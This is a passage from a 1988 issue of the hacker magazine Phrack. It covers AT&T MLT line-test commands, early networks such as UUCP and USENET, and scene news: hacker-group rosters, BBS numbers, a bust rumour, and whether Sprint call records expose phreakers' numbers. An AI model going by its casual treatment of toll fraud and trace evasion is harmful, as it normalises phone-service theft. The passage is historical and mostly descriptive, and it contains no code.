  2185.  
  2186. Tone puts a metallic tone on a line.  There may be many pairs in a single
  2187. cable, making it difficult for a repair person to locate a specific line.  The
  2188. tone makes this job easier.  Before MLT places a tone on a line it does a
  2189. test.  The results tell you if there is a fault on the line.  If there is a
  2190. callback on the line when you request a tone, it will be placed in monitor
  2191. mode.  If the status line gets brighter and you get a changed state message,
  2192. it means either 1) The repair person found the pr & wants to talk to you or 2)
  2193. The subscriber has gone off-hook.
  2194.  
  2195. Toneca:  Use tone to help identify a cable
  2196.  
  2197. Toneca puts a longitudinal tone on a line.  This tone helps the repair person
  2198. find the cable binder group that the pair is in.  The repair person finds the
  2199. correct cable by listening for the tone.  Because the tone can be heard on
  2200. pairs other than the one you put it on, when tone or tone+ are inappropriate.
  2201. If the repair person does not have time to find the cable on the first try,
  2202. you can repeat the request.  Before placing the tone on the line, MLT does a
  2203. pretest and tells you if there is a fault on the line.
  2204.  
  2205. Tonein:  Use tone to help a technician identify a special services pair
  2206.  
  2207. Tonein puts a metallic tone on a special services line.  It may be difficult
  2208. for a technician to locate a specific line.  The tone makes this job easier.
  2209. Before MLT places a tone on a line it does a pretest.  An MDF access is
  2210. required in order to request a tonein.  If a callback is on the line when you
  2211. request tonein, it is placed in monitor mode.  If the status line gets
  2212. brighter and you get a changed state message, it means either 1) The repair
  2213. person found the pr & wants to talk to you or, 2) The subscriber has gone
  2214. off-hook.
  2215.  
  2216. Tt:  Test the subscriber's touch-tone pad
  2217.  
  2218. Tt checks a subscriber's touch-tone pad.  It analyzes the tones produced when
  2219. the subscriber presses the button before you make a tt request.  You in the
  2220. sequence 1 through 0.  You must instruct the subscriber to press the buttons
  2221. after hearing dial tone.  Mlt will signal you over your headset with two beeps
  2222. if the pad is good or one or no beeps if it is bad.  A callback path should be
  2223. established before you make a tt request.  You must use a no-test trunk access
  2224. to request it.  You can use the ring request to contact the subscriber and set
  2225. up a callback.
  2226.  
  2227. Tv:  Trouble verification request
  2228.  
  2229. The tv request changes you from an stv mask to a tv mask.  Tv is used when you
  2230. need to do interactive testing of locally switched telephone lines, or tests
  2231. using an MDF trunk.  Switching to the tv mask will not affect any information
  2232. you left in the stv mask -- your status lines will remain the same; however,
  2233. the middle section of the mask will be changed.  Any request done from a tv
  2234. mask can also be done from an stv mask, but not vice versa.  The request can
  2235. only be run from a stv mask.
  2236.  
  2237. Ver##:  Get definition and example of a ver code
  2238.  
  2239. Ver## gives you a description of the ver code that you type in place of the
  2240. ##.  For example, a ver22 request will give you a definition of verification
  2241. code number 22 and an example of a typical set of test results that might
  2242. accompany a ver code of 22.  Use this request whenever you can't remember what
  2243. a certain ver code means.  MLT stores your tv mask when you request ver code
  2244. information.
  2245.  
  2246. Ver:  Test the entire telephone line
  2247.  
  2248. Ver starts a series of tests that do an extensive analysis of the entire line.
  2249. This includes both the inside and outside portions.  Many individual tests are
  2250. run but only the ver code and summary messages are displayed.  Outside, MLT
  2251. checks for AC and DC faults.  Inside, it checks the line circuit and dial
  2252. tone.
  2253.  
  2254.                Thanks to AT&T and the Bell Operating Companies.
  2255.  
  2256.                    Control C and The Tribunal of Knowledge
  2257.  
  2258.                 If you have any questions or comments contact:
  2259.  
  2260.                                   Control C
  2261.                                   Jack Death
  2262.                                 Prime Suspect
  2263.                                  The Prophet
  2264.                                   The Urvile
  2265.  
  2266.                        Or any other member of the TOK.
  2267. ==============================================================================
  2268.  
  2269.                                ==Phrack Inc.==
  2270.  
  2271.                      Volume Two, Issue 18, Phile #9 of 11
  2272.  
  2273.                      The Tribunal of Knowledge presents..
  2274.  
  2275.                           A Few Things About Networks
  2276.                           ===========================
  2277.  
  2278.                     Brought to you by  Prime Suspect (TOK)
  2279.  
  2280.                                 June 1,  1988
  2281.  
  2282.  
  2283.    Seems like if you're into hacking you sometime or  another run into  using
  2284. networks,  whether it  be Telenet, Tymnet,  or one of the  Wide Area Networks.
  2285. One  popular Network that hackers have used for some time is Arpanet.  Arpanet
  2286. has been  around for quite a  long time.  There are changes made  to it almost
  2287. daily and  the uses  of it are much more than just logging into other systems.
  2288. Many  college  students find themselves getting acquainted  with  Bitnet these
  2289. days.  Bitnet  is SO  new compared  to other  networks that it's  got a lot of
  2290. potential left.  There is  much more  to it then just mail and file transfers.
  2291. There are  interactive uses such as the  RELAY for real-time  discussion  with
  2292. others  (equivalent  to a  CB mode)  and  another popular  use is the  network
  2293. information  center  to receive  technical files  about networking.  There are
  2294. many many mail addresses that are used for database searching, and subscribing
  2295. to electronic  magazines.  You will  find these same  uses on other  Wide Area
  2296. Networks also.  I will  give you 3  related network areas.  These three  areas
  2297. include: The AT&T company networks,  UUCP,  and  Usenet  cooperative networks.
  2298. Please  note that some  of the information I gathered for this file dated back
  2299. to 1986.  But I tried to keep it as current as possible.
  2300.  
  2301.  
  2302. AT&T (Company Network)
  2303. ----------------------
  2304.  
  2305.    AT&T has  some internal  networks,  most of which  use internally developed
  2306. transport mechanisms.  Their most  widely used  networks are  UUCP and USENET,
  2307. which are not limited to that corporation and which  are discussed later.  All
  2308. internal AT&T networks support UUCP-style  h1!h2!h!u source routing syntax and
  2309. thus appear  to the user  to be UUCP.  Within  AT&T, UUCP  links are typically
  2310. over 1,200-bps dial-up telephone lines or Datakit (see below).
  2311.    Among AT&T's  other  networks,  CORNET is an internal  analog phone network
  2312. used by UUCP and  modems as an  alternative to  Direct Distance Dialing (DDD).
  2313. Datakit is  a circuit-switched  digital net  and is  similar  to X.25  in some
  2314. ways.  Most of Bell Laboratories is trunked together on Datakit.  On top of DK
  2315. transport  service, people run  UUCP for mail and  dkcu  for remote login.  In
  2316. addition to  host-to-host connections.  Datakit supports RS232 connections for
  2317. terminals, printers,  and hosts.  ISN is the  version of  Datakit supported by
  2318. AT&T Information Systems.  Bell Laboratories in  Holmdel, New Jersey, uses ISN
  2319. for  internal data  communication.  BLICN  (Bell Labs  Interlocation Computing
  2320. Network)  is an  IBM mainframe  RJE network dating from  the early  1970s when
  2321. Programmer's  Workbench  (PWB)  was a common  version  of the  UNIX  operating
  2322. system.  Many UNIX  machines with PWB-style RJE links use  BLICN to queue mail
  2323. and netnews for other UNIX machines.  A major  USENET host uses this mechanism
  2324. to feed  news  to about  80  neighbor hosts.  BLICN  covers  Bell Laboratories
  2325. installations  in  New Jersey,  Columbus, Ohio,  and Chicago,  and links  most
  2326. computer  center machines.  BLN (Bell Labs Network)  is an NSC Hyperchannel at
  2327. Indian Hill, Chicago.
  2328.    AT&T Internet is a TCP/IP internet.  It is not a major AT&T network, though
  2329. some of the best-known machines are on it.  There are many ethernets connected
  2330. by  TCP/IP over  Datakit.  This  internet may  soon be  connected to  the ARPA
  2331. Internet.
  2332.    ACCUNET  is AT&T's  commercial  X.25 network.  AT&T  MAIL  is a  commercial
  2333. service that is  heavily used  within  AT&T Information Systems  for corporate
  2334. internal mail.
  2335.  
  2336.  
  2337. UUCP (Cooperative Network)
  2338. --------------------------
  2339.  
  2340.    The name "UUCP,"  for Unix to Unix CoPy,  originally applied to a transport
  2341. service used over dial-ups between adjacent systems.  File transfer and remote
  2342. command execution were the original intent and main use of UUCP.  There was an
  2343. assumption that  any pair of communicating  machines had direct dial-up links,
  2344. that is,  that no relaying was done through intermediate machines.  By the end
  2345. of 1978,  there were  82  hosts within  Bell Laboratories  connected by  UUCP.
  2346. Though remote command execution and file transfer were heavily used,  there is
  2347. no  mention  of mail in  the standard  reference.  There was  another  similar
  2348. network of  "operational"  hosts with  UUCP links that were apparently outside
  2349. Bell  Laboratories,  but  still within  the  Bell  System.  The  two  networks
  2350. intersected at one Bell Laboratory machine.
  2351.    Both  of these  early  networks  differed  from the current UUCP network in
  2352. assuming  direct  connections  between  communicating  hosts and in not having
  2353. mail service.  The  UUCP mail network proper developed from the early networks
  2354. and spread as the UUCP programs were  distributed as part of the  Unix system.
  2355.    Remote command  execution  can be made  to work  over  successive  links by
  2356. arranging for each job in the chain to submit the next one.  There are several
  2357. programs that do this: Unfortunately, they are  all incompatible.  There is no
  2358. facility  at the  transport level for  routing beyond  adjacent systems or for
  2359. error acknowledgement.  All routing and end-to-end reliability support is done
  2360. explicitly  by  application protocols  implemented  using the  remote  command
  2361. execution facility.  There has never been any remote login facility associated
  2362. with UUCP, though the  cu  and  tip  programs are sometimes used over the same
  2363. telephone links.
  2364.    The UUCP  mail network  connects a very  diverse set of machines and users.
  2365. Most of the host  machines run the  UNIX  operating  system.  Mail is the only
  2366. service provided  throughout the  network.  In addition  to the  usual uses of
  2367. mail,  much  traffic  is  generated as  responses to  USENET  news.  The  same
  2368. underlying   UUCP   transport   mechanisms  are  also  used  to  support  much
  2369. of USENET.
  2370.    The UUCP  mail network has many problems with routing (it is one of the few
  2371. major networks that uses source routing)  and with its scale.  Nonetheless, it
  2372. is extremely popular and still growing rapidly.  This is attributable to three
  2373. circumstances:  ease of connection,  low cost, and its close relationship with
  2374. the USENET news network.
  2375.    Mailing lists  similar  to those  long current on the ARPANET have recently
  2376. increased in popularity on the UUCP mail network.  These permit a feature that
  2377. USENET  newsgroups  cannot  readily  supply:  a  limitation  on  access  on  a
  2378. per-person basis.  Also,  for low-traffic  discussions  mailing lists are more
  2379. economical,  since traffic  can be directed  to individuals according to their
  2380. specific interests.
  2381.    There  is no  central administration.  To connect  to the network, one need
  2382. only  find one machine that will  agree to be a neighbor.  For people at other
  2383. hosts to be able to  find your host,  however,  it is good to be registered in
  2384. the UUCP map,  which is  kept by the  group of  volunteers  known as  the UUCP
  2385. Project.  The map is posted monthly in the USENET  newsgroup "comp.mail.maps".
  2386. There is a directory of  personal addresses on the UUCP network, although this
  2387. is a commercial venture unrelated to the UUCP Project.
  2388.    Each host pays for it's own links;  some hosts  encourage others to connect
  2389. to them in order to shorten mail delivery paths.
  2390.    There is no clear distinction between transport and network layers in UUCP,
  2391. and there is  nothing  resembling an  Internet  Protocol.  The details  of the
  2392. transport protocol  are undocumented  (apparently not  actually proprietary to
  2393. AT&T,  contrary to rumor,  though the source code that implements the protocol
  2394. and is distributed with UNIX is AT&T's trade secret).
  2395.    Mail is  transferred by submitting  a mail command over a direct connection
  2396. by the  UUCP  remote command  execution mechanism.  The arguments  of the mail
  2397. command  indicate whether  the mail is to be  delivered locally on that system
  2398. or resubmitted  to another system.  In the  early days, it  was  necessary  to
  2399. guess the  route to a given  host and hope.  The only method of acknowledgment
  2400. was to  ask the  addressee to reply.  Now  there is a program (pathalias) that
  2401. can compute  reasonable routes  from the  UUCP map, and there is software that
  2402. can automatically look up those routes for users.
  2403.    The UUCP mail  network is  currently supported  in North America  mostly by
  2404. dial-up  telephone links.  In Europe  there is  a closely  associated  network
  2405. called EUnet, and in Japan there is JUNET.
  2406.    The most  common  dial-up link  speed on the UUCP mail network is 1,200 bps
  2407. though  there  are  still  a few  300-bps  links,  and  2,400 bps  is becoming
  2408. more popular.  Actually,  now I believe  that 1200-bps  is still very  common,
  2409. but 2400  may be just as common,  and 9600-bps  is much more common  than ever
  2410. thought it would be in 1986.  There are  also many  sites that  use 19,200-bps
  2411. for  using  UUCP.  When  systems are very close, they are sometimes  linked by
  2412. dedicated  lines, often  running at  9,600 bps.  Some UUCP  links are run over
  2413. local-area networks such as ethernets, sometimes on top of TCP/IP (though more
  2414. appropriate  protocols than  UUCP are usually  used over such transport media,
  2415. when UUCP is used it's usual point-to-point error  correction code is bypassed
  2416. to take advantage of the reliability of the  underlying network and to improve
  2417. bandwidth).  Some such links even exist on long-haul packet networks.
  2418.    The widespread  use of  more sophisticated  mail relay  programs  (such  as
  2419. sendmail and  MMDF) has  increased  reliability.  Still, there  are many hosts
  2420. with none of  these new  facilities,  and the  sheer size of the network makes
  2421. it unwieldly.
  2422.    The UUCP mail  network has  traditionally used  source code  routing with a
  2423. syntax like hosta!hostb!hostc!host!user.  The UUCP map and pathalias have made
  2424. this bearable, but it is still a nuisance.  An effort is underway to alleviate
  2425. the routing  problems by  implementing naming  in the  style of  ARPA Internet
  2426. domains.  This  might  also allow  integration  of the  UUCP name  space  into
  2427. the ARPA Internet domain name  space.  In fact there  is now an ATT.COM domain
  2428. in which most hosts are only on UUCP or CSNET.  Most UUCP hosts are not yet in
  2429. any Internet domain, however.  This domain effort is also handled  by the UUCP
  2430. Project and appears to be proceeding at a methodical but persistent pace.
  2431.    The hardware  used in  the UUCP  mail network  ranges from  small  personal
  2432. computers  through  workstations  to  minicomputers,   mainframes  and  super-
  2433. computers.  The network extends throughout  most of North America and parts of
  2434. Asia (Korea  and  Israel).  Including hosts  on the related networks JUNET (in
  2435. Japan) and  EUnet (in Europe),  there are at least 7,000 hosts on the network;
  2436. possibly 10,000 or more.  (EUnet and JUNET hosts are listed in the UUCP maps.)
  2437. The UUCP Project addresses are:
  2438.  
  2439. uucp-query@cbatt.ATT.COM
  2440. cbatt!uucp-query
  2441. uucp-query@cbatt.UUCP
  2442.  
  2443.        Much information about UUCP is published in USENET newsgroups.
  2444.  
  2445.  
  2446. USENET (Cooperative Network)
  2447. ----------------------------
  2448.  
  2449.    USENET began  in 1980  as a medium  of communication  between  users of two
  2450. machines,  one  at  the  University  of  North Carolina,  the  other  at  Duke
  2451. University.  It has since grown exponentially to its current size of more than
  2452. 2000 machines.  In the process, the software has been rewritten several times,
  2453. and the  transport  mechanisms  now used  to support  it include  not only the
  2454. original UUCP links, but also X.25, ACSNET, and others.
  2455.    USENET combines  the idea of mailing lists as long used on the ARPANET with
  2456. bulletin-board service such as has existed for many years on TOPS-20 and other
  2457. systems,  adding a  freedom of  subject  matter that  could never exist on the
  2458. ARPANET,  and reaching a more varied constituency.  While  chaotic  and  inane
  2459. ramblings abound, the network is quite popular.
  2460.    The  USENET news network  is a  distributed  computer  conferencing  system
  2461. bearing some similarities to commercial conferencing  systems like CompuServe,
  2462. though  USENET is  much more  distributed.  Users pursue  both  technical  and
  2463. social  ends  on USENET.   Exchanges are  submitted to  newsgroups on  various
  2464. topics, ranging from gardening to astronomy.
  2465.    The name "USENET"  comes from the USENIX Association.  The Professional and
  2466. Technical UNIX User's Group.  The name UNIX is a pun on Multics,  which is the
  2467. name  of a major  predecessor operating  system.  (The pun indicates that,  in
  2468. areas where Multics tries to do many things, UNIX tries to do one thing well.)
  2469. USENET has  no central  administration,  though there  are newsgroups to which
  2470. introductory  and other  information about  the  network  is  posted  monthly.
  2471. USENET  is  currently  defined as  the set  of hosts  receiving the  newsgroup
  2472. news.announce.  There are about  a dozen hosts that constitute the backbone of
  2473. the network,  keeping transit  times low by  doing  frequent  transfers  among
  2474. themselves and with other  hosts that  they feed.  Since these hosts bear much
  2475. of the burden of the network, their administrators tend to take a strong
  2476. interest  in the  state of  the network.  Most newsgroups  can be posted to by
  2477. anyone on  the network.  For others, it is necessary to mail a submission to a
  2478. moderator,  who decides whether  to post it.  Most moderators  just filter out
  2479. redundant  articles, though  some make  decisions  on  other  grounds.   These
  2480. newsgroup  moderators  form  another  group  interested  in  the  state of the
  2481. network.  Newsgroups  are created  or deleted  according to the decisions made
  2482. after the discussion in the newsgroup "news.groups".
  2483.    Each host  pays its  own telephone  bills.  The  backbone hosts have higher
  2484. bills than most other hosts due to their long-distance links among themselves.
  2485. The unit  of communication is  the news  article.  Each  article is  sent by a
  2486. flooding routing  algorithm to all  nodes on the network.  The transport layer
  2487. is UUCP for most  links, although  many others  are used, including ethernets,
  2488. berknets, and long-haul packet-switched networks; sometimes UUCP is run on top
  2489. of the others, and sometimes UUCP is not used at all.
  2490.    The many  problems with  USENET  (e.g. reader overload,  old software, slow
  2491. propagation speed, and high and unevenly  carried costs of transmission)  have
  2492. raised the possibility of  using the experience  gained in  USENET to design a
  2493. new  network to  replace it.  The  new network  might also  involve at least a
  2494. partial replacement for the UUCP mail network.
  2495.    One unusual mechanism that has been  proposed to support the new network is
  2496. stargate.   Commercial  television   broadcasting  techniques   leave   unused
  2497. bandwidth in  the vertical  blanking  interval  between picture  frames.  Some
  2498. broadcasters  are currently using this part of the signal to transmit Teletext
  2499. services.   Since   many   cable-television   channels   are  distributed  via
  2500. geo-synchronous satellites, a single input to a satellite  uplink facility can
  2501. reach all of  North America  on  an  appropriate  satellite  and  channel.   A
  2502. satellite uplink  company interested  in allowing  USENET-like articles  to be
  2503. broadcast  by  satellite on  a well-known  cable-television  channel has  been
  2504. found.  Prototypes of hardware  and software to encode  the articles and other
  2505. hardware to decode them  from a  cable-television  signal have  been built and
  2506. tested in  the field for  more than  a year.  A new, reasonably price model of
  2507. the decoding box may be available soon.
  2508.    This  facility would  allow most  compatible systems  within the  footprint
  2509. (area of coverage)  of the satellite and with access to the appropriate cable-
  2510. television channel to obtain decoding equipment and hook into the network at a
  2511. very reasonable cost.  Articles  would be submitted  for transmission by  UUCP
  2512. links to  the satellite  uplink  facility.  Most of the technical  problems of
  2513. Stargate seem to have been solved.
  2514.    More than  90 percent of all  USENET articles reach 90 percent of all hosts
  2515. on the network within  three days.  Though  there have  been some  famous bugs
  2516. that caused loss of articles, that particular problem has become rare.
  2517.    Every  USENET host  has a name.  That host  name and the name of the poster
  2518. are used to identify the source of an article.  Though those hosts that are on
  2519. both the UUCP mail and USENET news networks usually have the same name on both
  2520. networks, mail addresses  have no meaning  on USENET:  Mail related to  USENET
  2521. articles is usually sent via  UUCP mail;  it cannot be  sent over  USENET,  by
  2522. definition.  Though  the two networks have  always been closely related, there
  2523. are many more  hosts on UUCP than on USENET.  In Australia the two networks do
  2524. not even intersect except at one host.
  2525.    There  are  different  distributions  of  newsgroups  on  USENET.  Some  go
  2526. everywhere,  whereas  others are  limited to a  particular  continent, nation,
  2527. state or province, city,  organization, or even machine, though the more local
  2528. distributions  are not  really part  of USENET  proper.  The  European network
  2529. EUnet carries some  USENET newsgroups  and has another set of it's own.  JUNET
  2530. in Japan is similar to EUnet in this regard.
  2531.    There are about 2000  USENET hosts in the United States, Canada, Australia,
  2532. and  probably  in  other  countries.  The  hosts  on  EUnet,  SDN,  and  JUNET
  2533. communicate  with USENET hosts:  The total number of news hosts including ones
  2534. on those  three networks  is probably  at least  2500.  The  UUCP map includes
  2535. USENET  map  information  as  annotations.   A  list  of  legitimate   netwide
  2536. newsgroups  is  posted  to   several  newsgroups   monthly.   Volunteers  keep
  2537. statistics  on the  use of  the various  newsgroups (all  250 of  them) and on
  2538. frequency of posting by persons and hosts.  These are posted to news.newslists
  2539. once  a month, as  is the list  of  newsgroups.  Important  announcements  are
  2540. posted  to  moderated  newsgroups, news.announce  and  news.announce.newusers,
  2541. which are  intended to  reach all users (the current moderator is Mark Horton,
  2542. cbosgd!mark).  An address for information on the network is
  2543. seismo!usenet-request.
  2544.  
  2545.  
  2546.  
  2547. News on UUNET - June 1988
  2548. -------------------------
  2549.  
  2550.    A year ago,  UUNET (Fairfax, VA)  was formed to help ease the communication
  2551. load  of  the  beleaguered Usenet  network of  UNIX users.  Usenet connections
  2552. were becoming  increasingly costly and difficult to maintain, a situation that
  2553. prompted  the   Usenix  Association   to  fund  the  creation  of  the   UUNET
  2554. Communications Service  to assist users in accessing  Usenet.  Now,  UUNET has
  2555. become  the  "best connected"  UNIX  computer  in  the  world,  and  has  been
  2556. authorized to function as an Arpanet mail gateway.  Gateways to other networks
  2557. are expected to be established in the future.
  2558.  
  2559.  
  2560.    I guess  all use  of  UUNET  is done through the UUCP program found on Unix
  2561. operating systems.  Many people are  getting PC versions of the Unix Operating
  2562. system now-a-days,  so knowing  what's  available  before  getting hooked into
  2563. a network,  if that's your plan,  is advised.  There is an advertisement about
  2564. UUNET  on Bix  in the  networks conference somewhere.  The message may be old,
  2565. but still useful.
  2566.  
  2567. The cost of using UUNET is:  $30/month...  and $2/hour.  I  think  the  hourly
  2568. charge may only apply if connecting through Tymnet.  Not sure.
  2569.  
  2570. Accessible via Tymnet, their 800 number, or a regular local POTS number.
  2571.  
  2572. Connections can definitely  be made  up to  9600 baud.  19.2K baud  access may
  2573. also exist.  I think it does.
  2574.  
  2575.    If you're a UUNET user,  and want  to receive mail from someone through the
  2576. UUCP network,  they would  address it  just as any  other  UUCP mail  address.
  2577. An example is:   ...uunet!warble!joeuser
  2578.  
  2579. ------------------------------------------------------------------------------
  2580.  This file has been brought to you by Prime Suspect and Tribunal of Knowledge
  2581. ==============================================================================
  2582.  
  2583.  
  2584.                                ==Phrack Inc.==
  2585.  
  2586.                     Volume Two, Issue 18, Phile #10 of 11
  2587.  
  2588.              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2589.              PWN                                             PWN
  2590.              PWN      >>>>>=-* Phrack World News *-=<<<<<    PWN
  2591.              PWN                Issue XVIII/1                PWN
  2592.              PWN                                             PWN
  2593.              PWN       Created, Compiled, and Written        PWN
  2594.              PWN                 By: Epsilon                 PWN
  2595.              PWN                                             PWN
  2596.              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2597.  
  2598. Intro
  2599. =====
  2600.  
  2601. Welcome to yet another issue of Phrack World News.  We have once again
  2602. returned to try and bring you an entertaining, and informative newsletter
  2603. dedicated to the spread of information and knowledge throughout the H/P
  2604. community.
  2605. ______________________________________________________________________________
  2606.  
  2607. TOK Re-Formed
  2608. =============
  2609.  
  2610. A group called Tribunal Of Knowledge, which has undergone previous
  2611. re-formations has once again re-formed.  The person who is currently "in
  2612. charge" of the group says that he had permission from High Evolutionary, the
  2613. group's founder, to re-form the organization.  Although the group hasn't
  2614. publicly announced their existence or written any files, we should be hearing
  2615. from them in the near future.
  2616.  
  2617. The Current Members of TOK Include -
  2618.  
  2619.          Control C
  2620.          Prime Suspect
  2621.          Jack Death
  2622.          The UrVile
  2623.          The Prophet
  2624.          Psychic Warlord
  2625.  
  2626.              Information Provided By Control C, and Prime Suspect.
  2627. ______________________________________________________________________________
  2628.  
  2629. Phrack Inc. Support Boards
  2630. ==========================
  2631.  
  2632. Phrack Inc. has always made it a habit to set up Phrack Inc. sponsor accounts
  2633. on the more popular boards around.  These sponsor accounts are set up, so that
  2634. the users may get in touch with the Phrack Magazine staff if they would like
  2635. to contribute an article, or any other information to our publication.  Please
  2636. take note of the boards on which Phrack Inc. accounts are set up.  Thank you.
  2637.  
  2638. The Current List of Phrack Inc. Sponsor Boards Includes -
  2639.  
  2640.          P-80 Systems        - 304/744-2253
  2641.          OSUNY               - 914/725-4060
  2642.          The Central Office  - 914/234-3260
  2643.          Digital Logic's DS  - 305/395-6906
  2644.          The Forgotten Realm - 618/943-2399 *
  2645.  
  2646.          * - Phrack Headquarters
  2647. ______________________________________________________________________________
  2648.  
  2649. SummerCon '88 Preliminary Planning
  2650. ==================================
  2651.  
  2652. Planning for SummerCon '88 is underway.  So far, we have decided on four
  2653. tentative locations:  New York City, Saint Louis, Atlanta, or Florida.  Since
  2654. this is only tentative, no dates have been set or reservations made for a
  2655. conference.
  2656.  
  2657. If you have any comments, suggestions, etc, please let us know.  If you are
  2658. planning to attend SummerCon '88, please let us know as well.  Thank you.
  2659.  
  2660.                  Information Provided By The Forgotten Realm.
  2661. ______________________________________________________________________________
  2662.  
  2663. LOD/H Technical Journal
  2664. =======================
  2665.  
  2666. Lex Luthor of LOD/H (Legion of Doom/Hackers) has been busy with school, etc.,
  2667. so he has not had the time, nor the initiative to release the next issue of
  2668. the LOD/H Technical Journal.  On this note, he has tentatively turned the
  2669. Journal over to Phantom Phreaker, who will probably be taking all
  2670. contributions for the Journal.  No additional information is available.
  2671.  
  2672.            Information Provided By The UrVile and Phantom Phreaker.
  2673. ______________________________________________________________________________
  2674.  
  2675. Congress To Restrict 976/900 Dial-A-Porn Services
  2676. =================================================
  2677.  
  2678. Congress is considering proposals to restrict dial-up services in an effort to
  2679. make it difficult for minors to access sexually explicit messages.  A
  2680. House-Senate committee is currently negotiating the "dial-a-porn" proposal.
  2681. Lawmakers disagree whether or not the proposal is constitutional and are
  2682. debating the issue of requiring phone companies to offer a service that would
  2683. allow parents, free of charge, to block the 976/900 services.  Other proposals
  2684. would require customers to pay in advance or use credit cards to access the
  2685. 976/900 services.
  2686.  
  2687. Some companies are currently offering free services that restrict minors from
  2688. accessing sexually explicit messages.  AT&T and Department of Justice
  2689. officials are cooperating in a nationwide crackdown of "dial-a-porn" telephone
  2690. companies.  The FCC recently brought charges against one of AT&T's largest 900
  2691. Service customers, and AT&T provided the confidential information necessary in
  2692. the prosecution.  AT&T also agreed to suspend or disconnect services of
  2693. companies violating the commission ban by transmitting obscene or indecent
  2694. messages to minors.
  2695. ______________________________________________________________________________
  2696.  
  2697. Some Hope Left For Victims Of FGD
  2698. =================================
  2699.  
  2700. US Sprint's famed FGD (Feature Group D) dial-ups and 800 INWATS exchanges may
  2701. pose no threat to individuals under switches that do not yet offer equal
  2702. access service to alternate long distance carriers.  Due to the way Feature
  2703. Group D routes its information, the ten-digit originating number of the caller
  2704. is not provided when the call is placed from a non-equal access area.  The
  2705. following was taken from an explanation of US Sprint's 800 INWATS Service.
  2706.  
  2707.         *************************************************************
  2708.  
  2709.                                  CALL DETAIL
  2710.  
  2711.         *************************************************************
  2712.  
  2713. With US Sprint 800 Service, a customer will receive call detail information
  2714. for every call on every invoice.  The call detail for each call includes:
  2715.  
  2716.          o  Date of call
  2717.          o  Time of call
  2718.          o  The originating city and state
  2719.          o  The ten-digit number of the caller if the call originates in an
  2720.             equal access area or the NPA of the caller if the non-equal access
  2721.             area.
  2722.          o  Band into which the call falls
  2723.          o  Duration of the call in minutes
  2724.          o  Cost of the call
  2725.  
  2726. This came directly from US Sprint.  Do as you choose, but don't depend on
  2727. this.
  2728.  
  2729.                       Information Provided by US Sprint.
  2730. ______________________________________________________________________________
  2731.  
  2732. Telenet Bolsters Network With Encryption
  2733. ========================================
  2734.  
  2735. Telenet Communications Corporation strengthened its public data network
  2736. recently with the introduction of data encryption capability.
  2737.  
  2738. The X.25 Encryption Service provides a type of data security previously
  2739. unavailable on any public data network, according to analysts.  For Telenet,
  2740. the purpose of the offering is "to be more competitive; nobody else does
  2741. this," according to Belden Menkus, an independent network security consultant
  2742. based in Middleville, NJ.
  2743.  
  2744. The service is aimed at users transmitting proprietary information between
  2745. host computers, such as insurance or fund-transfer applications.  It is priced
  2746. at $200 per month per host computer connection.  Both the confidentiality and
  2747. integrity of the data can be protected via encryption.
  2748.  
  2749. The scheme provides end-to-end data encryption, an alternative method whereby
  2750. data is decrypted and recrypted at each node in the network.  "This is a
  2751. recognition that end-to-end encryption is really preferable to link
  2752. encryption," Menkus said.
  2753.  
  2754. The service is available over both dial-up and leased lines, and it supports
  2755. both synchronous and asynchronous traffic at speeds up to 9.6K BPS.
  2756.  
  2757. Telenet has approved one particular data encryption device for use with the
  2758. service, The Cipher X 5000, from Technical Communications Corporation (TCC), a
  2759. Concord, Massachusetts based vendor.  TCC "has been around the data encryption
  2760. business for quite a while," Menkus said.
  2761.  
  2762. The Cipher X implements the National Bureau of Standards' Data Encryption
  2763. Standard (DES).  DES is an algorithm manipulated by a secret 56 bit key.
  2764. Computers protected with the device can only be accessed by users with a
  2765. matching key.
  2766.  
  2767. The data encryptor is installed at user sites between the host computer and
  2768. the PAD (Packet Assembler/Disassembler).
  2769.  
  2770. Installation of the TCC device does not affect the user's ability to send
  2771. non-encrypted data, according to Telenet.  By maintaining a table of network
  2772. addresses that require encryption, the device decides whether or not to
  2773. encrypt each transmission.
  2774.  
  2775.                     Information Provided by Network World.
  2776. ______________________________________________________________________________
  2777. ==============================================================================
  2778.  
  2779.                                ==Phrack Inc.==
  2780.  
  2781.                     Volume Two, Issue 18, Phile #11 of 11
  2782.  
  2783.              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2784.              PWN                                             PWN
  2785.              PWN      >>>>>=-* Phrack World News *-=<<<<<    PWN
  2786.              PWN                Issue XVIII/2                PWN
  2787.              PWN                                             PWN
  2788.              PWN          Created By Knight Lightning        PWN
  2789.              PWN                                             PWN
  2790.              PWN             Compiled and Written            PWN
  2791.              PWN                  by Epsilon                 PWN
  2792.              PWN                                             PWN
  2793.              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2794.  
  2795.  
  2796. Intro
  2797. =====
  2798.  
  2799. It seems that there is yet some things to be covered.  In addendum, we will be
  2800. featuring, as a part of PWN, a special section where up-and-coming H/P
  2801. Bulletin Boards can be advertised.  This will let everyone know where the
  2802. board scene stands.  If you have a board that you feel has potential, but
  2803. doesn't have good users, let us know.  Thanks.
  2804. ______________________________________________________________________________
  2805.  
  2806. Doctor Cypher Busted?
  2807. =====================
  2808.  
  2809. Doctor Cypher, who frequents the Altos Chat, The Dallas Hack Shack, Digital
  2810. Logic's Data Service, The Forgotten Realm, P-80 Systems, and others, is
  2811. believed to have had his modem confiscated by "Telephone Company Security,"
  2812. and by his local Sheriff.  No charges have been filed as of this date.  He
  2813. says he will be using a friend's equipment to stay in touch with the world.
  2814.  
  2815.                   Information Provided by Hatchet Molly
  2816. ______________________________________________________________________________
  2817.  
  2818. Give These Boards A Call
  2819. ========================
  2820.  
  2821. These systems have potential, but need good users, so give them a call, and
  2822. help the world out.
  2823.  
  2824.          The Autobahn -                The Outlet Private -
  2825.  
  2826.          703/629-4422                  313/261-6141
  2827.          Primary - 'central'           newuser/kenwood
  2828.          Sysop - The Highwayman        Sysop - Ax Murderer
  2829.          Hack/Phreak                   Private Hack/Phreak
  2830.  
  2831.          Dallas Hack Shack -           The Forgotten Realm -
  2832.  
  2833.          214/422-4307                  618/943-2399
  2834.          Apply For Access              Apply For Access
  2835.          Sysop - David Lightman        Sysop - Crimson Death
  2836.          Private Hack/Phreak           Private H/P & Phrack Headquarters
  2837. ______________________________________________________________________________
  2838.  
  2839. AllNet Hacking Is Getting Expensive
  2840. ===================================
  2841.  
  2842. For those of you who hack AllNet Long Distance Service, watch out.  AllNet
